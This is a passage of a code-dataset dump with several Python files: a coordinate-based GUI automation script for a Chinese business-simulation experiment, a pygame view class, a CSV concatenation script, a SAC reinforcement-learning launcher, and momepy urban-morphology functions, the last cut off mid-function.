610)\n mouse_click(870, 555) # 4.3存储\n choose_to_rent(1020, 490)\n choose_to_rent(1020, 530)\n choose_to_rent(1020, 570)\n mouse_click(870, 590) # 4.4域名服务\n choose_to_rent(1020, 495)\n choose_to_rent(1020, 530)\n mouse_click(870, 620) # 4.5数据分析\n choose_to_rent(1020, 495)\n choose_to_rent(1020, 530)\n choose_to_rent(1020, 570)\n choose_to_rent(1020, 610)\n choose_to_rent(1020, 650)\n mouse_click(870, 650) # 4.6安全防护\n choose_to_rent(1020, 493)\n choose_to_rent(1020, 530)\n choose_to_rent(1020, 570)\n pass\n\ndef resource_chose_buy():\n \"\"\"选择购买\"\"\"\n # 生成随机值\n flag_number = random.randint(1, 3)\n # Step1:硬件资源配置\n mouse_click(720, 488)\n choose_to_buy(870, 488)\n choose_to_buy(870, 540)\n choose_to_buy(870, 590)\n choose_to_buy(870, 640)\n # Step2:软件资源配置\n mouse_click(720, 540)\n choose_to_buy(870, 488)\n choose_to_buy(870, 540)\n # Step3:网络资源配置\n mouse_click(720, 590)\n choose_to_buy(870, 488)\n choose_to_buy(870, 540)\n choose_to_buy(870, 590)\n choose_to_buy(870, 640)\n # Step4:运营资源配置\n mouse_click(720, 640)\n mouse_click(870, 490) # 4.1计算\n choose_to_buy(1020, 492)\n choose_to_buy(1020, 532)\n choose_to_buy(1020, 568)\n mouse_click(870, 520) # 4.2数据库\n choose_to_buy(1022, 492)\n choose_to_buy(1022, 531)\n choose_to_buy(1022, 570)\n choose_to_buy(1022, 610)\n mouse_click(870, 555) # 4.3存储\n choose_to_buy(1020, 490)\n choose_to_buy(1020, 530)\n choose_to_buy(1020, 570)\n mouse_click(870, 590) # 4.4域名服务\n choose_to_buy(1020, 495)\n choose_to_buy(1020, 530)\n mouse_click(870, 620) # 4.5数据分析\n choose_to_buy(1020, 495)\n choose_to_buy(1020, 530)\n choose_to_buy(1020, 570)\n choose_to_buy(1020, 610)\n choose_to_buy(1020, 650)\n mouse_click(870, 650) # 4.6安全防护\n choose_to_buy(1020, 493)\n choose_to_buy(1020, 530)\n choose_to_buy(1020, 570)\n\n\ndef select_option(x1, y1, x2, y2):\n mouse_click(x1, y1)\n mouse_click(x2, y2)\n\n\ndef judge_load_status():\n\n pass\n\n\ndef basis(user_dir):\n\n # 点击开始\n mouse_click(941, 539)\n\n # 完整流程\n time.sleep(2)\n mouse_click(798, 541)\n time.sleep(20)\n\n # 开始页面截图\n save_picture(466, 272, 1420, 804, user_dir, '开始页面')\n time.sleep(5)\n mouse_click(1116, 760)\n time.sleep(90) # 加载时间较长\n\n # much_mouse_click(1116, 760, 23)\n much_mouse_click(1116, 760, 5, 5)\n time.sleep(15)\n mouse_click(1116, 760)\n time.sleep(15)\n much_mouse_click(1116, 760, 3, 10)\n much_mouse_click(1116, 760, 4, 5)\n much_mouse_click(1116, 760, 1, 10)\n much_mouse_click(1116, 760, 9, 5)\n\n\n\n# basis('C:\\\\Users\\\\jvlunl\\\\Desktop\\\\test1\\\\仿真系统\\\\resources\\\\20191106\\\\15251853026')\n\n\ndef resource_configuration_module():\n \"\"\"资源配置模块\"\"\"\n # 填写用户人数\n mouse_click_and_input_content(950, 653, '120132')\n # 点击提交\n mouse_click(1228, 684)\n # 点击下一步\n mouse_click(946, 688)\n # 点击业务预测框\n mouse_click_and_input_content(1100, 657, '147464')\n # 点击提交\n mouse_click(1240, 710)\n # 点击下一步\n mouse_click(1130, 668)\n time.sleep(2)\n # 查看资源配置图后点击确定\n mouse_click(1230, 730)\n # 点击开始配置资源\n mouse_click(1330, 643)\n # ------------开始配置资源-----------------\n # todo:选择购买或者租赁\n if '资源配置.png' in os.listdir(os.path.dirname(RESOURCES_SETTING_PNG)):\n os.rename(RESOURCES_SETTING_PNG, os.path.join(os.path.dirname(RESOURCES_SETTING_PNG), str(time.time()).replace('.', '')+'.png'))\n time.sleep(5)\n # todo:坐标待测试\n save_picture(1083, 437, 1179, 457, os.path.dirname(RESOURCES_SETTING_PNG), '资源配置')\n time.sleep(5)\n\n # 获取文字识别结果\n result_list = get_text_by_img(RESOURCES_SETTING_PNG)\n if '成长期' in result_list or '成熟期' in result_list or '持续发展期' in result_list:\n resource_chose_buy()\n else:\n resource_chose_rent()\n\n # 点击提交\n mouse_click(1200, 710)\n time.sleep(10)\n # 点击确认\n mouse_click(945, 648)\n time.sleep(10)\n # 资源配置模式选择\n select_option(1177, 465, 1113, 511)\n mouse_click_and_input_content(1156, 542, '1040')\n # 点击提交\n mouse_click(1230, 720)\n mouse_click(1180, 653)\n\n # 优化循环\n # much_mouse_click(1116, 760, 7)\n mouse_click(1116, 760)\n much_mouse_click(1116, 760, 1, 10)\n mouse_click(1116, 760)\n much_mouse_click(1116, 760, 1, 10)\n much_mouse_click(1116, 760, 3, 2)\n\n\n\n\ndef business_design_module():\n \"\"\"业务设计模块\"\"\"\n # action1:填写预计套餐费用\n mouse_click_and_input_content(650, 615, '95')\n pull_mouse(712, 611, 747, 607)\n pull_mouse(816, 613, 834, 613)\n mouse_click(943, 727)\n mouse_click_and_input_content(650, 615, '55')\n pull_mouse(712, 611, 729, 607)\n pull_mouse(816, 613, 834, 613)\n mouse_click(943, 727)\n mouse_click_and_input_content(650, 615, '28')\n pull_mouse(712, 611, 717, 607)\n mouse_click(943, 727)\n much_mouse_click(1116, 760, 4)\n # action2:业务流程设计\n mouse_click(935, 582)\n mouse_click(1116, 760)\n # todo: 根据字段识别顺序,拉动\n # 1. 截图保存,先重命名原截图,再截取保存\n if '产品流程.png' in os.listdir(os.path.dirname(PRODUCT_FLOW_PNG)):\n os.rename(PRODUCT_FLOW_PNG, os.path.join(os.path.dirname(PRODUCT_FLOW_PNG), str(time.time()).replace('.', '')+'.png'))\n time.sleep(5)\n save_picture(631, 375, 773, 680, os.path.dirname(PRODUCT_FLOW_PNG), '产品流程')\n time.sleep(2)\n\n # 2. 获取字段顺序,拖动\n result_list = get_text_by_img(PRODUCT_FLOW_PNG)\n from_index = [[609, 395], [615, 437], [610, 481],\n [608, 528], [615, 569], [612, 618],\n [610, 663]]\n # 选定目标用户群\n if '选定目标用户群' in result_list:\n if result_list.index('选定目标用户群') < 7:\n pull_mouse(*from_index[result_list.index('选定目标用户群')], 899, 460)\n # result_list.index('选定目标用户群')\n # 对用户群调研\n if '对用户群体进行调研' in result_list:\n if result_list.index('对用户群体进行调研') < 7:\n \n pull_mouse(*from_index[result_list.index('对用户群体进行调研')], 1020, 463)\n # result_list.index('对用户群体进行调研')\n # 设计产品实例\n if '设计产品实例' in result_list:\n if result_list.index('设计产品实例') < 7:\n pull_mouse(*from_index[result_list.index('设计产品实例')], 1146, 463)\n # result_list.index('设计产品实例')\n # 指定定价策略\n if '制定定价策略' in result_list:\n if result_list.index('制定定价策略') < 7:\n pull_mouse(*from_index[result_list.index('制定定价策略')], 1270, 463)\n # result_list.index('制定定价策略')\n # 产品测试\n if '产品测试' in result_list:\n if result_list.index('产品测试') < 7:\n pull_mouse(*from_index[result_list.index('产品测试')], 897, 595)\n # result_list.index('产品测试')\n # 产品优化\n if '产品优化' in result_list:\n if result_list.index('产品优化') < 7:\n pull_mouse(*from_index[result_list.index('产品优化')], 1023, 595)\n # result_list.index('产品优化')\n # 产品推广\n if '产品推广' in result_list:\n if result_list.index('产品推广') < 7:\n \n pull_mouse(*from_index[result_list.index('产品推广')], 1150, 595)\n # result_list.index('产品推广')\n mouse_click(1268, 674)\n mouse_click(1037, 614)\n mouse_click(1116, 760)\n # todo: 选择字段,判断字段是否是随机的,是随机分布\n mouse_click(1272, 673)\n mouse_click(1270, 647)\n if random.randint(1, 2) == 2: # 错误选择\n mouse_click(1275, 617)\n else:\n mouse_click(1270, 589) # 第三个无效字段\n # 点击确认\n mouse_click(1325, 746)\n time.sleep(2)\n much_mouse_click(1116, 760, 5, 2)\n mouse_click(953, 572)\n much_mouse_click(1116, 760, 2, 2)\n time.sleep(10)\n # action3:字段分析\n # todo:数据面板展示流程需要debug\n # 点击新业务费\n mouse_click(737, 436)\n mouse_click(574, 549)\n mouse_click(641, 324)\n mouse_click(1345, 778)\n much_mouse_click(1116, 760, 4, 3)\n mouse_click(1264, 790)\n # mouse_click_and_input_content(1025, 787, '250004443241')\n # 业务号是随机的,需要模拟点击\n time.sleep(5)\n mouse_click(640, 468)\n # 提交\n mouse_click(1370, 790)\n time.sleep(2)\n\n much_mouse_click(1116, 760, 8, 3)\n # 开始业务设计\n mouse_click(946, 550)\n mouse_click(952, 634)\n much_mouse_click(1116, 760, 2)\n mouse_click(945, 561)\n much_mouse_click(1116, 760, 6)\n # 流失分析\n mouse_click_and_input_content(1189, 466, '64')\n mouse_click_and_input_content(1189, 513, '14')\n mouse_click_and_input_content(1189, 560, '27')\n mouse_click_and_input_content(1189, 611, '56')\n mouse_click(1196, 671)\n pull_mouse(713, 747, 548, 746)\n mouse_click(592, 735)\n mouse_click(708, 727)\n mouse_click(823, 730)\n mouse_click(938, 730)\n mouse_click(1050, 729)\n # 点击生成\n mouse_click(1232, 740)\n mouse_click(1312, 739)\n # action4:设计挽留业务\n mouse_click_and_input_content(826, 506, '9')\n mouse_click_and_input_content(970, 506, '9')\n mouse_click_and_input_content(1150, 506, '9')\n mouse_click_and_input_content(824, 557, '9')\n mouse_click_and_input_content(966, 557, '9')\n mouse_click_and_input_content(1153, 557, '9')\n mouse_click_and_input_content(827, 608, '9')\n mouse_click_and_input_content(968, 608, '9')\n mouse_click_and_input_content(1148, 608, '9')\n mouse_click(943, 659)\n much_mouse_click(1116, 760, 5)\n time.sleep(20)\n much_mouse_click(1116, 760, 3)\n time.sleep(10)\n much_mouse_click(1116, 760, 2)\n\n\ndef marketing_module():\n \"\"\"市场推广模块\"\"\"\n mouse_click_and_input_content(1307, 611, '0.1')\n mouse_click_and_input_content(1306, 650, '1590.16')\n mouse_click_and_input_content(1299, 684, '1027.38')\n mouse_click_and_input_content(1307, 715, '1391.58')\n mouse_click(1298, 758)\n time.sleep(10)\n mouse_click(1170, 662)\n time.sleep(10)\n mouse_click(1116, 760)\n time.sleep(10)\n # 业务定价\n # 先设定条件\n mouse_click(617, 489)\n time.sleep(1)\n mouse_click(599, 545)\n time.sleep(1)\n mouse_click(569, 606)\n time.sleep(1)\n mouse_click(639, 666)\n time.sleep(2)\n mouse_click_and_input_content(1104, 515, '0.24')\n mouse_click_and_input_content(1271, 516, '0.6')\n mouse_click_and_input_content(1104, 553, '0.22')\n mouse_click_and_input_content(1277, 554, '0.55')\n mouse_click_and_input_content(1104, 593, '0.3')\n mouse_click_and_input_content(1269, 594, '0.75')\n mouse_click(1110, 664)\n time.sleep(5)\n mouse_click(944, 725)\n mouse_click(1116, 760)\n time.sleep(5)\n # 产品推广方式\n mouse_click_and_input_content(1026, 494, '5')\n mouse_click_and_input_content(1028, 553, '5')\n mouse_click(946, 599)\n time.sleep(5)\n mouse_click(1116, 760)\n # 产品收益表\n mouse_click_and_input_content(768, 629, '489683')\n mouse_click_and_input_content(861, 626, '367119')\n mouse_click_and_input_content(958, 628, '244755')\n mouse_click_and_input_content(769, 655, '167315.4')\n mouse_click_and_input_content(865, 655, '111558.6')\n mouse_click_and_input_content(955, 657, '55801.8')\n mouse_click_and_input_content(772, 683, '23760')\n mouse_click_and_input_content(863, 684, '15840')\n mouse_click_and_input_content(946, 686, '7920')\n mouse_click(1217, 685)\n time.sleep(5)\n much_mouse_click(1116, 760, 2, 2)\n # 风险控制原则\n select_option(1297, 547, 1277, 638)\n select_option(1278, 590, 1281, 651)\n select_option(1285, 632, 1263, 712)\n select_option(1311, 678, 1284, 748)\n # 点击提交\n mouse_click(1321, 744)\n time.sleep(5)\n mouse_click(941, 700)\n time.sleep(5)\n much_mouse_click(1116, 760, 2)\n time.sleep(30)\n\n# marketing_module()\n\ndef profit_and_loss_measurement_module():\n \"\"\"损益测算模块\"\"\"\n much_mouse_click(1116, 760, 9, 3)\n time.sleep(5)\n # 调整概率\n pull_mouse(908, 460, 945, 456)\n pull_mouse(885, 498, 908, 501)\n mouse_click_and_input_content(941, 597, '21088.550')\n mouse_click_and_input_content(943, 623, '7039.944')\n mouse_click_and_input_content(942, 658, '18216.000')\n mouse_click(943, 698)\n time.sleep(5)\n mouse_click(946, 712)\n time.sleep(5)\n # 设定计算参数\n mouse_click(1074, 469)\n mouse_click(1074, 498)\n mouse_click_and_input_content(1121, 557, '40')\n mouse_click_and_input_content(1124, 591, '800')\n mouse_click_and_input_content(1121, 622, '2540')\n mouse_click(943, 657)\n time.sleep(5)\n mouse_click(946, 650)\n time.sleep(5)\n # 计算变动成本\n pull_mouse(980, 519, 997, 517)\n mouse_click_and_input_content(947, 601, '2000')\n mouse_click(951, 655)\n time.sleep(5)\n mouse_click(947, 655)\n # 产品损益表\n mouse_click_and_input_content(995, 540, '16548.550')\n mouse_click_and_input_content(997, 564, '2499.944')\n mouse_click_and_input_content(993, 586, '13676.000')\n mouse_click(943, 635)\n time.sleep(2)\n mouse_click(1180, 734)\n mouse_click(1256, 722)\n much_mouse_click(1116, 760, 3, 2)\n time.sleep(2)\n much_mouse_click(1116, 760, 2, 2)\n # 点击记录\n time.sleep(6)\n mouse_click(1049, 530)\n\n# profit_and_loss_measurement_module(user_dir)\n\n\n\ndef submit_file_firefox_in_shiyanshi():\n png.moveTo(642, 1006, duration=1)\n png.click()\n time.sleep(10) \n png.moveTo(67, 142, duration=2)\n png.click()\n png.moveTo(204, 140, duration=2)\n png.click()\n png.moveTo(777, 508, duration=2)\n png.click()\n time.sleep(20)\n png.moveTo(1911, 540, duration=1)\n png.dragTo(1911, 800, duration=3)\n time.sleep(10)\n # 点击提交\n png.moveTo(951, 907, duration=2)\n png.click()\n pass\n\n\n\ntime.sleep(30)\nlogger.info(\"前期配置开始\")\nbasis('C:\\\\Users\\\\Public\\\\Pictures')\n\nlogger.info(\"资源配置开始\")\nresource_configuration_module()\n\nlogger.info(\"商业配置开始\")\nbusiness_design_module()\n\nlogger.info(\"市场配置开始\")\nmarketing_module()\n\nlogger.info(\"利润损失配置开始\")\nprofit_and_loss_measurement_module()\n\n\ntime.sleep(30)\nwinsound.Beep(300, 1000)\ninput(\"准备开始提交流程: \")\nsubmit_file_firefox_in_shiyanshi()\n\n\ntime.sleep(40)\nsave_picture(0, 0, 1900, 900, 'C:\\\\Users\\\\Public\\\\Pictures', '实验成绩截图')\ntime.sleep(10000)\n\n\n\n\n\n\n\n","sub_path":"fangzhen/process3.py","file_name":"process3.py","file_ext":"py","file_size_in_byte":18241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"398534380","text":"import pygame\nfrom settings import *\nfrom all_image import *\nfrom color_settings import *\n\n\nclass GameView:\n def __init__(self):\n self.win = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))\n\n def draw_bg(self):\n self.win.blit(BACKGROUND_IMAGE, (0, 0))\n\n def draw_enemies(self, enemies):\n enemies.tower.draw(self.win)\n for virus in enemies.get():\n self.win.blit(virus.image, virus.rect)\n # draw health bar\n bar_width = virus.rect.w * (virus.health / virus.max_health)\n max_bar_width = virus.rect.w\n bar_height = 5\n pygame.draw.rect(self.win, RED, [virus.rect.x, virus.rect.y - 10, max_bar_width, bar_height])\n pygame.draw.rect(self.win, GREEN, [virus.rect.x, virus.rect.y - 10, bar_width, bar_height])\n\n def draw_ally(self, allies):\n allies.tower.draw(self.win)\n for cat in allies.get():\n self.win.blit(cat.image, cat.rect)\n # draw health bar\n bar_width = cat.rect.w * (cat.health / cat.max_health)\n max_bar_width = cat.rect.w\n bar_height = 5\n pygame.draw.rect(self.win, RED, [cat.rect.x, cat.rect.y - 10, max_bar_width, bar_height])\n pygame.draw.rect(self.win, GREEN, [cat.rect.x, cat.rect.y - 10, bar_width, bar_height])\n\n def draw_menu(self, menu):\n \"\"\"the menu is the button menu in the game\"\"\"\n for but in menu.get_buttons():\n self.win.blit(but.image, but.rect)\n\n def draw_mana_bar(self, mana_group):\n max_bar_width = MANA_W\n bar_width = max_bar_width * (mana_group.mana / mana_group.max_mana)\n bar_height = 20\n pygame.draw.rect(self.win, GRAY, [MANA_X, MANA_Y, max_bar_width, bar_height])\n pygame.draw.rect(self.win, GRAY, pygame.Rect(MANA_X-5, MANA_Y-5, max_bar_width+10, bar_height+10), 2)\n pygame.draw.rect(self.win, WHITE, [MANA_X, MANA_Y, bar_width, bar_height]) # remaining mana\n\n def draw_game_over(self, game_over_type):\n game_over_type.draw(self.win)\n\n","sub_path":"game/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"285251798","text":"#! /usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport os\r\n\r\nf = open('concatenated.csv', \"w\", encoding='utf-8')\r\n\r\nheader_written = False\r\n\r\ndirs = os.listdir(os.getcwd())\r\nfor file in dirs:\r\n if (file[-4:] == \".csv\"):\r\n if os.path.isfile(file) and not file == 'concatenated.csv':\r\n for line in open(file, encoding='utf-8').readlines():\r\n if line[:14] == '\"citation_key\"':\r\n if header_written:\r\n continue\r\n f.write('\"cited\",')\r\n f.write(line)\r\n header_written = True\r\n else:\r\n f.write('\"' + file[:-4] + '\",')\r\n f.write(line)\r\nf.close()\r\n","sub_path":"concatenate_csvs/concatenate_csvs.py","file_name":"concatenate_csvs.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"79136434","text":"from multiprocessing import Process\nimport seagul.envs\n\nimport gym\nenv_name = \"su_acrobot-v0\"\nenv = gym.make(env_name)\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nfrom numpy import pi\n\n# init policy, value fn\ninput_size = 4\noutput_size = 1\nlayer_size = 32\nnum_layers = 2\nactivation = nn.ReLU\n\nfrom seagul.rl.run_utils import run_sg\nfrom seagul.rl.sac import sac, SACModel\nfrom seagul.nn import MLP\nfrom seagul.integration import euler\n\nproc_list = []\ntrial_num = input(\"What trial is this?\\n\")\n\nm1 = 1; m2 = 1\nl1 = 1; l2 = 1\nlc1 = .5; lc2 = .5\nI1 = .2; I2 = 1.0\ng = 9.8\nmax_torque = 25\nmax_t = 10\n\n\ndef reward_fn_sq(s, a):\n reward = -.1*((s[0] - np.pi/2)**2 + s[1]**2)\n return reward, False\n\n\nfor seed in np.random.randint(0, 2 ** 32, 8):\n\n policy = MLP(input_size, output_size*2, num_layers, layer_size, activation)\n value_fn = MLP(input_size, 1, num_layers, layer_size, activation)\n q1_fn = MLP(input_size + output_size, 1, num_layers, layer_size, activation)\n q2_fn = MLP(input_size + output_size, 1, num_layers, layer_size, activation)\n\n\n model = SACModel(\n policy=policy,\n value_fn = value_fn,\n q1_fn = q1_fn,\n q2_fn = q2_fn,\n act_limit = max_torque,\n )\n\n env_config = {\n \"init_state\": [-pi/2, 0, 0, 0],\n \"max_torque\": max_torque,\n \"init_state_weights\": [np.pi, np.pi, 0, 0],\n \"dt\": .01,\n \"reward_fn\" : reward_fn_sq,\n \"max_t\" : max_t,\n \"m2\": m2,\n \"m1\": m1,\n \"l1\": l1,\n \"lc1\": lc1,\n \"lc2\": lc2,\n \"i1\": I1,\n \"i2\": I2,\n \"act_hold\" : 20,\n }\n\n alg_config = {\n \"env_name\": env_name,\n \"model\": model,\n \"seed\": seed, # int((time.time() % 1)*1e8),\n \"total_steps\" : 1e6,\n \"alpha\" : .05,\n \"exploration_steps\" : 50000,\n \"min_steps_per_update\" : 500,\n \"gamma\": 1,\n \"min_steps_per_update\" : 500,\n \"sgd_batch_size\": 128,\n \"replay_batch_size\" : 4096,\n \"iters_per_update\": 16,\n #\"iters_per_update\": float('inf'),\n \"env_config\": env_config\n }\n\n p = Process(\n target=run_sg,\n args=(alg_config, sac, \"sac-test\", \"no act hold this time\", \"/data_needle/\" + trial_num + \"/\" + \"seed\" + str(seed)),\n )\n p.start()\n proc_list.append(p)\n\n\nfor p in proc_list:\n print(\"joining\")\n p.join()\n","sub_path":"switched_rl/run_sac.py","file_name":"run_sac.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"458735895","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# distribution.py\n# definitons of spatial distribution characters\n\nfrom tqdm import tqdm # progress bar\nfrom shapely.geometry import LineString, Point\nimport numpy as np\nimport pandas as pd\nimport statistics\nimport networkx as nx\n\nfrom .utils import gdf_to_nx\nfrom .utils import nx_to_gdf\n\n\ndef orientation(objects):\n \"\"\"\n Calculate orientation (azimuth) of object\n\n Defined as an orientation of the longext axis of bounding rectangle in range 0 - 45.\n It captures the deviation of orientation from cardinal directions.\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n References\n ---------\n Schirmer PM and Axhausen KW (2015) A multiscale classification of urban morphology.\n Journal of Transport and Land Use 9(1): 101–130. (adapted)\n\n Examples\n --------\n >>> buildings_df['orientation'] = momepy.orientation(buildings_df)\n Calculating orientations...\n 100%|██████████| 144/144 [00:00<00:00, 630.54it/s]\n Orientations calculated.\n >>> buildings_df['orientation'][0]\n 41.05146788287027\n \"\"\"\n # define empty list for results\n results_list = []\n\n print('Calculating orientations...')\n\n def _azimuth(point1, point2):\n '''azimuth between 2 shapely points (interval 0 - 180)'''\n angle = np.arctan2(point2.x - point1.x, point2.y - point1.y)\n return np.degrees(angle)if angle > 0 else np.degrees(angle) + 180\n\n # iterating over rows one by one\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n bbox = list(row['geometry'].minimum_rotated_rectangle.exterior.coords)\n centroid_ab = LineString([bbox[0], bbox[1]]).centroid\n centroid_cd = LineString([bbox[2], bbox[3]]).centroid\n axis1 = centroid_ab.distance(centroid_cd)\n\n centroid_bc = LineString([bbox[1], bbox[2]]).centroid\n centroid_da = LineString([bbox[3], bbox[0]]).centroid\n axis2 = centroid_bc.distance(centroid_da)\n\n if axis1 <= axis2:\n az = _azimuth(centroid_bc, centroid_da)\n if 90 > az >= 45:\n diff = az - 45\n az = az - 2 * diff\n elif 135 > az >= 90:\n diff = az - 90\n az = az - 2 * diff\n diff = az - 45\n az = az - 2 * diff\n elif 181 > az >= 135:\n diff = az - 135\n az = az - 2 * diff\n diff = az - 90\n az = az - 2 * diff\n diff = az - 45\n az = az - 2 * diff\n results_list.append(az)\n else:\n az = 170\n az = _azimuth(centroid_ab, centroid_cd)\n if 90 > az >= 45:\n diff = az - 45\n az = az - 2 * diff\n elif 135 > az >= 90:\n diff = az - 90\n az = az - 2 * diff\n diff = az - 45\n az = az - 2 * diff\n elif 181 > az >= 135:\n diff = az - 135\n az = az - 2 * diff\n diff = az - 90\n az = az - 2 * diff\n diff = az - 45\n az = az - 2 * diff\n results_list.append(az)\n\n series = pd.Series(results_list)\n print('Orientations calculated.')\n return series\n\n\ndef shared_walls_ratio(objects, unique_id, perimeters=None):\n \"\"\"\n Calculate shared walls ratio\n\n .. math::\n \\\\textit{length of shared walls} \\\\over perimeter\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n unique_id : str, list, np.array, pd.Series\n the name of the dataframe column, np.array, or pd.Series with unique id\n perimeters : str, list, np.array, pd.Series (default None)\n the name of the dataframe column, np.array, or pd.Series where is stored perimeter value\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n References\n ---------\n Hamaina R, Leduc T and Moreau G (2012) Towards Urban Fabrics Characterization\n Based on Buildings Footprints. In: Lecture Notes in Geoinformation and Cartography,\n Berlin, Heidelberg: Springer Berlin Heidelberg, pp. 327–346. Available from:\n https://link.springer.com/chapter/10.1007/978-3-642-29063-3_18.\n\n Examples\n --------\n >>> buildings_df['swr'] = momepy.shared_walls_ratio(buildings_df, 'uID')\n Generating spatial index...\n Calculating shared walls ratio...\n 100%|██████████| 144/144 [00:00<00:00, 648.72it/s]\n Shared walls ratio calculated.\n >>> buildings_df['swr'][10]\n 0.3424804411228673\n \"\"\"\n print('Generating spatial index...')\n sindex = objects.sindex # define rtree index\n # define empty list for results\n results_list = []\n\n print('Calculating shared walls ratio...')\n\n if perimeters is None:\n objects['mm_p'] = objects.geometry.length\n perimeters = 'mm_p'\n else:\n if not isinstance(perimeters, str):\n objects['mm_p'] = perimeters\n perimeters = 'mm_p'\n if not isinstance(unique_id, str):\n objects['mm_uid'] = unique_id\n unique_id = 'mm_uid'\n\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n neighbors = list(sindex.intersection(row.geometry.bounds))\n neighbors.remove(index)\n\n # if no neighbour exists\n length = 0\n if not neighbors:\n results_list.append(0)\n else:\n for i in neighbors:\n subset = objects.loc[i]['geometry']\n length = length + row.geometry.intersection(subset).length\n results_list.append(length / row[perimeters])\n series = pd.Series(results_list)\n print('Shared walls ratio calculated.')\n if 'mm_p' in objects.columns:\n objects.drop(columns=['mm_p'], inplace=True)\n if 'mm_uid' in objects.columns:\n objects.drop(columns=['mm_uid'], inplace=True)\n return series\n\n\ndef street_alignment(objects, streets, orientations, network_id_objects, network_id_streets):\n \"\"\"\n Calculate the difference between street orientation and orientation of object in degrees\n\n Orientation of street segment is represented by the orientation of line\n connecting first and last point of the segment. Network ID linking each object\n to specific street segment is needed. Can be generated by :py:func:`momepy.get_network_id`.\n\n .. math::\n \\\\left|{\\\\textit{building orientation} - \\\\textit{street orientation}}\\\\right|\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n streets : GeoDataFrame\n GeoDataFrame containing street network\n orientations : str, list, np.array, pd.Series\n the name of the dataframe column, np.array, or pd.Series where is stored object orientation value\n (can be calculated using :py:func:`momepy.orientation`)\n network_id_objects : str, list, np.array, pd.Series\n the name of the dataframe column, np.array, or pd.Series where is stored object network ID\n network_id_streets : str, list, np.array, pd.Series\n the name of the dataframe column, np.array, or pd.Series of streets with unique network id (has to be defined beforehand)\n (can be defined using :py:func:`momepy.elements.unique_id`)\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n Examples\n --------\n >>> buildings_df['street_alignment'] = momepy.street_alignment(buildings_df, streets_df, 'orientation', 'nID', 'nID')\n Calculating street alignments...\n 100%|██████████| 144/144 [00:00<00:00, 529.94it/s]\n Street alignments calculated.\n >>> buildings_df['street_alignment'][0]\n 0.29073888476702336\n \"\"\"\n # define empty list for results\n results_list = []\n\n print('Calculating street alignments...')\n\n if not isinstance(orientations, str):\n objects['mm_o'] = orientations\n orientations = 'mm_o'\n if not isinstance(network_id_objects, str):\n objects['mm_nid'] = network_id_objects\n network_id_objects = 'mm_nid'\n if not isinstance(network_id_streets, str):\n streets['mm_nis'] = network_id_streets\n network_id_streets = 'mm_nis'\n\n def azimuth(point1, point2):\n '''azimuth between 2 shapely points (interval 0 - 180)'''\n angle = np.arctan2(point2.x - point1.x, point2.y - point1.y)\n return np.degrees(angle)if angle > 0 else np.degrees(angle) + 180\n\n # iterating over rows one by one\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n if pd.isnull(row[network_id_objects]):\n results_list.append(0)\n else:\n network_id = row[network_id_objects]\n streetssub = streets.loc[streets[network_id_streets] == network_id]\n start = Point(streetssub.iloc[0]['geometry'].coords[0])\n end = Point(streetssub.iloc[0]['geometry'].coords[-1])\n az = azimuth(start, end)\n if 90 > az >= 45:\n diff = az - 45\n az = az - 2 * diff\n elif 135 > az >= 90:\n diff = az - 90\n az = az - 2 * diff\n diff = az - 45\n az = az - 2 * diff\n elif 181 > az >= 135:\n diff = az - 135\n az = az - 2 * diff\n diff = az - 90\n az = az - 2 * diff\n diff = az - 45\n az = az - 2 * diff\n results_list.append(abs(row[orientations] - az))\n series = pd.Series(results_list)\n if 'mm_o' in objects.columns:\n objects.drop(columns=['mm_o'], inplace=True)\n if 'mm_nid' in objects.columns:\n objects.drop(columns=['mm_nid'], inplace=True)\n if 'mm_nis' in streets.columns:\n streets.drop(columns=['mm_nis'], inplace=True)\n print('Street alignments calculated.')\n return series\n\n\ndef cell_alignment(objects, tessellation, orientations, cell_orientations, unique_id):\n \"\"\"\n Calculate the difference between cell orientation and orientation of object\n\n .. math::\n \\\\left|{\\\\textit{building orientation} - \\\\textit{cell orientation}}\\\\right|\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n tessellation : GeoDataFrame\n GeoDataFrame containing street network\n orientations : str, list, np.array, pd.Series\n the name of the dataframe column, np.array, or pd.Series where is stored object orientation value\n (can be calculated using :py:func:`momepy.orientation`)\n cell_orientations : str, list, np.array, pd.Series\n the name of the dataframe column, np.array, or pd.Series where is stored object orientation value\n (can be calculated using :py:func:`momepy.orientation`)\n unique_id : str\n the name of the dataframe column with unique id shared between a cell and a building\n (must be present in both geodataframes)\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n Examples\n --------\n >>> buildings_df['cell_alignment'] = momepy.cell_alignment(buildings_df, tessellation_df, 'bl_orient', 'tes_orient', 'uID')\n Calculating cell alignments...\n 100%|██████████| 144/144 [00:00<00:00, 799.09it/s]\n Cell alignments calculated.\n >>> buildings_df['cell_alignment'][0]\n 0.8795123936951939\n\n Notes\n -----\n Allow left unique_id and right unique_id.\n \"\"\"\n print('Calculating cell alignments...')\n\n if not isinstance(orientations, str):\n objects['mm_o'] = orientations\n orientations = 'mm_o'\n if not isinstance(cell_orientations, str):\n tessellation['mm_o'] = cell_orientations\n cell_orientations = 'mm_o'\n\n # define empty list for results\n results_list = []\n\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n\n 